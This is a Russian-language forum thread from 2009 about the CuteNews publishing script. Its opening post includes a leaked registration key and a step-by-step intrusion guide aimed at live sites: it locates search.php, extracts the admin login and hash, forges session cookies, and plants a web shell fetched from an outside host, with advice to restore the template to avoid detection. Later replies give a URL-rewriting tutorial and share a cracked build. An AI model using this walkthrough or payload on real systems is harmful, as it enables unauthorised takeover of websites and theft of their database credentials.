CuteNews - простая и мощная система публикации новостей

Everybody · 2009 Май 12, 00:58

Данный новостной движок используется часто для хранения новостей/статей для посетителей.

CuteNews - это мощная и несложная в обращении система публикации новостей, построенная на оригинальной разработке CutePHP Team, использующая в качестве базы данных текстовые файлы. Системные требования для работы скрипта минимальны, а возможности неограниченны! Вы можете использовать CuteNews для ведения новостной ленты, как онлайн-дневник или как настоящую систему управления контентом. Вот только неполный список того, что можно сделать на сайте при помощи данного скрипта (и все это без использования mySQL):
1. добавление и редактирования новостей с поддержкой HTML;
2. создание неограниченного количества категорий
3. регистрация пользователей с четырьмя уровнями доступа
4. архивирование и резервное копирование новостей
5. осуществление поиска по новостям и архиву и многое др

Скачать *https://cuttephp.com
Регистрация:

Создать в папке /data/reg.php скрипт, содержимое -

Цитировать<?php
$reg_site_key = '066781-346489-020145';
$mmbrid = '769934';
$reg_display_name = 'x-mu.net';
?>

В принципе скрипт реги ничего не дает кроме удаления копирайтов, которые вручную можно поправить в скрипте ../inc/show.inc.php в самом низу закодированный bese64 код и есть копирайт

Пару уязвимостей +fix

ЦитироватьВ cookies установить $cookie = "dosearch=yes;files_arch[]=./data/users.db.php;title=$username"; (фикс хз)
-
Сплоит *https://milw0rm.com/exploits/4779 (бага в скрипте search.php, удалите его )
Код Выделить Развернуть
1. Находим сайт на движке cutenews 2. После того, как нашли сайт, ищем файл search.php по адресу .../news/search.php 3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1. 4. Теперь нам надо узнать логин админа, для этого переходим сюда и вводим полный путь к search.php 5. Получили логин админа и теперь узнаем хэш админа, для этого переходим сюда и вводим Логин (у меня root) и путь к файлу search.php 6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e) Устанавливаем Firefox и плагин для него. Дальше идем Инструменты=>Редактор Cookies=>Добавить Заполняем: 1. Имя=>username 2. Содержимое=>Логин администратора (у меня root) 3. Узел=> путь к сайту (БЕЗ https:// напр. www.сайт.ру) 4. Путь=>Путь к админке (у меня /news/) Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить: 1. Имя=>md5_password 2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e) 3. Узел=> путь к сайту (БЕЗ https://, напр. www.сайт.ру) 4. Путь=>Путь к админке (у меня /news/) Сохраняем... Теперь идем в админку... Воаля, вы залогинены))) Не спешите добавить похабную новость, давайте зальем туда шелл, что бы узнать пароли от mysql и вообще управлять содержимым сайта. Заливаем шелл: Настройкa блока новостей=>Редактировать шаблоны=>Активные новости Удаляем от туда всё и вставляем следующее: Код: HTML; $file = file_get_contents('https://shellss.by.ru/file.txt'); $brd = fopen('file.php','w+'); $write = fwrite($brd, $file); Сохранить... Через пару минут наш файл загрузится. Заходим .../news/file.php вводим логин-1 пароль-1 Потом не забудьте изменить шаблон активных новостей "как было", что бы не спалиться. [i]Источник: nulled.cc[/i]
-
Сплоит *https://securityvulns.ru/Sdocument769.html
-
Свежий сплоит *https://www.securitylab.ru/poc/366114.php (fix достаточно отключить в php.ini fopen)

п.с. Для усложнения взлома можно ограничить права доступа к файлам через .htaccess

Vaflan · 2009 Май 12, 01:08

Ем... как-то всё сложно, можно проще сделать, что бы на сайт через include('news.txt'); вставлять файл и потом в файле (news.txt) ручками писать news.
Вот это действительно просто без БД и Быстро )

Everybody · 2009 Май 12, 01:22

Цитата: vaflan от 2009 Май 12, 00:08 Ем... как-то всё сложно, можно проще сделать, что бы на сайт через include('news.txt'); вставлять файл и потом в файле (news.txt) ручками писать news.
Вот это действительно просто без БД и Быстро )

Это кончно самый простой и надежный способ, но коментировать новость такую врят-ли можно пользователям. )) На cutenews удобно делать мультиязычность...

Vaflan · 2009 Май 12, 01:40

Если голова на плечах, то можно весь сайт без ДБ написать,
Я когда не знал вообще как пользоваться дб, всё делал в файле *.dat.

Те же комментарии допустим:

Код Выделить

<?if(isset($_POST['comment'])) {
$base=fopen("comment.dat","a");
fputs($base,$_POST['comment']);
}?>
<form method="post">
<input type="text" name="comment">
<input type="submit" value="Send">
</form>
<?include('comment.dat');?>

И вот можно добавлять с сайта в файл.

LeGrand · 2009 Май 12, 07:06

vaflan
Залить шелл, и попросчатцо со своей базой...И сервером...
Everybody
Кутневс действительно хорошая весч, 80% новостей на серверах сделаны на ней
Можно редактировать все шаблоны, зашел в ФронтПейдж, сделал себе норм шаблон для новостей, и вставил в шаблонизатор внутри системы

Vaflan · 2009 Май 12, 16:34

Цитата: LeGrand от 2009 Май 12, 06:06 vaflan
Залить шелл, и попросчатцо со своей базой...И сервером...

Если умеешь делать правильно сайт, то сможешь сделать защиту.
Это я просто привёл пример, как добавлять с сайта в документ.

cokpat · 2009 Май 12, 22:20

только вот почему то у меня эта cutenews на прочь не дружит с русским, вернее русский через нее ввожу но выводит каракули

Кодировки уже менял и "туда и сюда" и не вышло

Кто подскажет на какие грабли наступаю?

Everybody · 2009 Май 14, 04:24

cokpat что за проблема такая впервые слышу, сам выбрал cutenews изза того что с кодировками проблем никогда не возикало. Скинул бы сорс паги и скрин, быстрее разобрались бы.

Делаем ЧПУ (человеко понятные урл) для Cutenews.

Вначале уедитесь что удален файл .htaccess в директории веба (или переименуйте, потомучто далее автоматически будет создан новый после проделанного ниже)

1. Отрываем скрипт в (у меня news.php) в который вставляли инклюд CuteNews новости.

Код Выделить

include("cute/show_news.php");
2. Доавить выше следующий код:

Код Выделить

//Mod_rewrite
ob_start();
//Mod_rewrite

3. Добавить ниже следующий код:

Код Выделить

//Mod_rewrite
$show_news = ob_get_contents();
ob_get_clean();

$script_file = end($script_url = explode("/", $HTTP_SERVER_VARS['SCRIPT_NAME']));
$path = substr($HTTP_SERVER_VARS['SCRIPT_NAME'], 0, -strlen($script_file));

$find = array(	/*post*/			"#".$script_file."?subaction=showfull&id=(.*?)&archive=&start_from=&ucat=(.*?)&#i",
/*postcomments*/	"#".$script_file."?subaction=showcomments&id=(.*?)&archive=&start_from=&ucat=(.*?)&#i",
/*postpage*/		"#".$script_file."?start_from=(.*?)&ucat=&archive=&subaction=&id=&#i",
/*archiveindex*/	"#".$script_file."?archive=(.*?)&subaction=list-archive&#i",
/*archive*/			"#".$script_file."?subaction=showfull&id=(.*?)&archive=(.*?)&start_from=&ucat=&#i",
/*archivepage*/		"#".$script_file."?start_from=(.*?)&ucat=&archive=(.*?)&subaction=list-archive&id=&#i",
/*archivecomments*/	"#".$script_file."?subaction=showcomments&id=(.*?)&archive=(.*?)&start_from=&ucat=(.*)&#",
/*searchnews*/		"#".$script_file."?misc=search&subaction=showfull&id=(.*?)&archive=&cnshow=news&ucat=(.*?)&start_from=#",
/*searcharchives*/	"#".$script_file."?misc=search&subaction=showfull&id=(.*?)&archive=(.*?)&cnshow=news&ucat=(.*?)&start_from=#",
/*ncommentspage*/	"#".$script_file."?comm_start_from=(.*?)&archive=&subaction=showcomments&id=(.*?)&ucat=(.*?)&#",
/*acommentspage*/	"#".$script_file."?comm_start_from=(.*?)&archive=(.*?)&subaction=showcomments&id=(.*?)&ucat=(.*?)&#",
);

$replace = array(	"post/\1-\2.html&",
"postcomments/\1-\2.html&",
"postpage/\1.html&",
"archiveindex/\1.html&",
"archive/\1/\2.html&",
"archivepage/\2/\1.html&",
"archivecomments/\1/\2.html&",
"searchnews/\1/\2",
"searcharchives/\1/\2",
"ncommentspage/\1/\2-\3.html&",
"acommentspage/\1/\2/\3.html&",
);

$show_news = preg_replace($find,$replace,$show_news);

if(!file_exists('.htaccess')){
$htaccess = "RewriteEngine Onn";
$htaccess .= "RewriteBase ".$path."nn";
$htaccess .= "RewriteRule ^post/([0-9]*)-(.*).html(.*)$ ".$script_file."?subaction=showfull&id=$1&ucat=$2$3 [L,NC]n";
$htaccess .= "RewriteRule ^postcomments/([0-9]*)-(.*).html(.*)$ ".$script_file."?subaction=showcomments&id=$1&ucat=$2$3 [L,NC]n";
$htaccess .= "RewriteRule ^postpage/(.*).html(.*)$ ".$script_file."?start_from=$1$2 [L,NC]nn";
$htaccess .= "RewriteRule ^archiveindex/(.*).html(.*)$ ".$script_file."?archive=$1&subaction=list-archive$2 [L,NC]n";
$htaccess .= "RewriteRule ^archive/([0-9]*)/(.*).html(.*)$ ".$script_file."?subaction=showfull&id=$1&archive=$2$3 [L,NC]n";
$htaccess .= "RewriteRule ^archivepage/(.*)/(.*).html(.*)$ ".$script_file."?start_from=$2&archive=$1&subaction=list-archive$3 [L,NC]n";
$htaccess .= "RewriteRule ^archivecomments/(.*)/(.*).html(.*)$ ".$script_file."?subaction=showcomments&id=$1&archive=$2$3 [L,NC]nn";
$htaccess .= "RewriteRule ^searchnews/([0-9]*)/(.*)$ ".$script_file."?misc=search&subaction=showfull&id=$1&ucat=$2&cnshow=news& [L,NC]n";
$htaccess .= "RewriteRule ^searcharchives/([0-9]*)/(.*)$ ".$script_file."?misc=search&subaction=showfull&id=$1&archive=$2&cnshow=news& [L,NC]nn";
$htaccess .= "RewriteRule ^ncommentspage/(.*)/(.*)-(.*).html(.*)$ ".$script_file."?comm_start_from=$1&archive=&subaction=showcomments&id=$2&ucat=$3$4 [L,NC]n";
$htaccess .= "RewriteRule ^acommentspage/(.*)/(.*)/(.*).html(.*)$ ".$script_file."?comm_start_from=$1&archive=$2&subaction=showcomments&id=$3$4 [L,NC]";

$file = fopen(".htaccess", "w");
fwrite($file, $htaccess);
fclose($file);
}

echo $show_news;
//Mod_rewrite

Код в итоге состоит теперь в таком порядке:

Код Выделить

//Mod_rewrite
ob_start();
//Mod_rewrite

include("cute/show_news.php");

//Mod_rewrite
$show_news = ob_get_contents();
ob_get_clean();

$script_file = end($script_url = explode("/", $HTTP_SERVER_VARS['SCRIPT_NAME']));
$path = substr($HTTP_SERVER_VARS['SCRIPT_NAME'], 0, -strlen($script_file));

$find = array(	/*post*/			"#".$script_file."?subaction=showfull&id=(.*?)&archive=&start_from=&ucat=(.*?)&#i",
/*postcomments*/	"#".$script_file."?subaction=showcomments&id=(.*?)&archive=&start_from=&ucat=(.*?)&#i",
/*postpage*/		"#".$script_file."?start_from=(.*?)&ucat=&archive=&subaction=&id=&#i",
/*archiveindex*/	"#".$script_file."?archive=(.*?)&subaction=list-archive&#i",
/*archive*/			"#".$script_file."?subaction=showfull&id=(.*?)&archive=(.*?)&start_from=&ucat=&#i",
/*archivepage*/		"#".$script_file."?start_from=(.*?)&ucat=&archive=(.*?)&subaction=list-archive&id=&#i",
/*archivecomments*/	"#".$script_file."?subaction=showcomments&id=(.*?)&archive=(.*?)&start_from=&ucat=(.*)&#",
/*searchnews*/		"#".$script_file."?misc=search&subaction=showfull&id=(.*?)&archive=&cnshow=news&ucat=(.*?)&start_from=#",
/*searcharchives*/	"#".$script_file."?misc=search&subaction=showfull&id=(.*?)&archive=(.*?)&cnshow=news&ucat=(.*?)&start_from=#",
/*ncommentspage*/	"#".$script_file."?comm_start_from=(.*?)&archive=&subaction=showcomments&id=(.*?)&ucat=(.*?)&#",
/*acommentspage*/	"#".$script_file."?comm_start_from=(.*?)&archive=(.*?)&subaction=showcomments&id=(.*?)&ucat=(.*?)&#",
);

$replace = array(	"post/\1-\2.html&",
"postcomments/\1-\2.html&",
"postpage/\1.html&",
"archiveindex/\1.html&",
"archive/\1/\2.html&",
"archivepage/\2/\1.html&",
"archivecomments/\1/\2.html&",
"searchnews/\1/\2",
"searcharchives/\1/\2",
"ncommentspage/\1/\2-\3.html&",
"acommentspage/\1/\2/\3.html&",
);

$show_news = preg_replace($find,$replace,$show_news);

if(!file_exists('.htaccess')){
$htaccess = "RewriteEngine Onn";
$htaccess .= "RewriteBase ".$path."nn";
$htaccess .= "RewriteRule ^post/([0-9]*)-(.*).html(.*)$ ".$script_file."?subaction=showfull&id=$1&ucat=$2$3 [L,NC]n";
$htaccess .= "RewriteRule ^postcomments/([0-9]*)-(.*).html(.*)$ ".$script_file."?subaction=showcomments&id=$1&ucat=$2$3 [L,NC]n";
$htaccess .= "RewriteRule ^postpage/(.*).html(.*)$ ".$script_file."?start_from=$1$2 [L,NC]nn";
$htaccess .= "RewriteRule ^archiveindex/(.*).html(.*)$ ".$script_file."?archive=$1&subaction=list-archive$2 [L,NC]n";
$htaccess .= "RewriteRule ^archive/([0-9]*)/(.*).html(.*)$ ".$script_file."?subaction=showfull&id=$1&archive=$2$3 [L,NC]n";
$htaccess .= "RewriteRule ^archivepage/(.*)/(.*).html(.*)$ ".$script_file."?start_from=$2&archive=$1&subaction=list-archive$3 [L,NC]n";
$htaccess .= "RewriteRule ^archivecomments/(.*)/(.*).html(.*)$ ".$script_file."?subaction=showcomments&id=$1&archive=$2$3 [L,NC]nn";
$htaccess .= "RewriteRule ^searchnews/([0-9]*)/(.*)$ ".$script_file."?misc=search&subaction=showfull&id=$1&ucat=$2&cnshow=news& [L,NC]n";
$htaccess .= "RewriteRule ^searcharchives/([0-9]*)/(.*)$ ".$script_file."?misc=search&subaction=showfull&id=$1&archive=$2&cnshow=news& [L,NC]nn";
$htaccess .= "RewriteRule ^ncommentspage/(.*)/(.*)-(.*).html(.*)$ ".$script_file."?comm_start_from=$1&archive=&subaction=showcomments&id=$2&ucat=$3$4 [L,NC]n";
$htaccess .= "RewriteRule ^acommentspage/(.*)/(.*)/(.*).html(.*)$ ".$script_file."?comm_start_from=$1&archive=$2&subaction=showcomments&id=$3$4 [L,NC]";

$file = fopen(".htaccess", "w");
fwrite($file, $htaccess);
fclose($file);
}

echo $show_news;
//Mod_rewrite

(было) Раньше новости имели адрес примерно:
../index.php?subaction=showcomments&id=1242078578&archive=&start_from=&ucat=1&

(стало) Теперь имеют более приемливый вид:
../post/1242078578-1.html&

ЦитироватьВопрос: Как включить mod_rewrite на Apache?
Ответ: Для включения mod_rewrite на веб-сервере Apache необходимо отредактировать файл httpd.conf.
Для этого открываем файл httpd.conf, ищем строчку:
#LoadModule rewrite_module modules/mod_rewrite.so
И убираем #:
LoadModule rewrite_module modules/mod_rewrite.so

п.с. Автоматически создается .htaccess с записами как надо для вашей структуры папки веба, и теперь все урл на лету засчет включенного Mod_Rewrite преобразуются в более читабельный вид.

cokpat · 2009 Май 14, 09:24

проблема была в том что название темы не хотело отображать русский

Но я уже поправил эту проблему

HuKaTuH[GM] · 2009 Май 25, 07:17

Спасибо EveryBody за тему ! Думаю многим пригодиться

Думаю в скором времени ещё дырки надуться

По теме : можно просто удалить search.php и всё будет нормально

MaMoHT · 2009 Июль 01, 14:10

cokat Как ты поправил ету проблему у меня такаяже?!!

cokpat · 2009 Июль 01, 14:14

Цитата: MaMoHT от 2009 Июль 01, 13:10 cokat Как ты поправил ету проблему у меня такаяже?!!

перепробывал туеву кучу версий и нашел ту которая отображает

если не ошибаюсь то из какогото ДСВ выдрал(не фришного)

MaMoHT · 2009 Июль 01, 15:29

Скинь плиз ссылку или твой если нетрудно ато очень надо

cokpat · 2009 Июль 01, 16:27

лови только дырки сам по закрываешь, надеюсь не нуб сможешь это сделать.

https://rapidshare.com/files/250683926/_news.rar.html

x-MU.net форум

CuteNews - простая и мощная система публикации новостей

Everybody

Vaflan

Everybody

Vaflan

LeGrand

Vaflan

cokpat

Everybody

cokpat

HuKaTuH[GM]

MaMoHT

cokpat

MaMoHT

cokpat

Похожие темы (5)